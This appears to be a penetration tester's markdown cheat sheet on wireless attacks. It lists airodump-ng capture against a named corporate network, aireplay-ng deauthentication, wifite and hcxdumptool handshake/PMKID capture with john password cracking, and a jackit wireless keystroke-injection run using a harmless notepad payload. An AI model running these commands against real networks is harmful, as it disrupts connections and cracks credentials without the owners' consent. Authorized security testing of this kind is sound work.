# WiFi
## Tips
```
sudo kismet
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
sudo airodump-ng -c 11 --bssid=D0:D3:E0:47:B0:01 -w psk wlp0s20f3mon
sudo airodump-ng -c 11 --essid-regex XX-Corporate -w psk wlp0s20f3mon
```
## Deauth
```
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 wlp0s20f3mon
Target client:
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 -c xx:xx:xx:xx wlp0s20f3mon
```
## wctl
```
:> iwctl
NetworkConfigurationEnabled: disabled
StateDirectory: /var/lib/iwd
Version: 2.15
[iwd]# station
list wlan1
[iwd]# station wlan1 scan
[iwd]# station wlan1 get-networks
```
wifite
```
sudo wifite
WPS:
wifite -e nomedarede
wifite -e rede --pmkid
wifite -c 10 -(hidden SSids)
wifite --wep
wifite --crack
https://github.com/derv82/wifite2
```
## htcxdumptool
```
sudo hcxdumptool -i wlan3 -w output
hcxpcapngtool -o hashcat output --prefix=hash2200 --john=cracking_john --all
Get all the obtained networks:
cat cracking_john | cut -d ":" -f1 | uniq
john --wordlist=/usr/share/wordlists/wifite.txt cracking_john
```
## nRFID
```
sudo ./jackit --script script.txt
[+] Scanning every 5s CTRL-C when ready.
KEY ADDRESS CHANNELS COUNT SEEN TYPE PACKET
----- -------------- ---------- ------- ----------- ---------- -----------------
1 E7:40:62:76:02 79 2 0:03:49 ago Amazon HID 02:FC:EF:FF:02:5D
2 37:DD:35:EA:10 23,41 4 0:01:29 ago Unknown 02:09:D0:FF:47
[+] Select target keys (1-1) separated by commas, or 'all': [all]: 1
[+] Ping success on channel 2
[+] Sending attack to E7:40:62:76:02 [Amazon HID] on channel 2
[+] All attacks completed
```
```
DELAY 500
GUI r
DELAY 500
STRING notepad.exe
ENTER
DELAY 1000
STRING Hello World!
```
{% embed url="" %}
## References
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
[
](https://tbhaxor.com/evil-twin-wifi-network-using-hostapd-mana/https://www.netprojnetworks.com/setting-up-a-wireless-pentest-lab-part-2/https://www.netprojnetworks.com/wireless-pentest-lab-part-3/)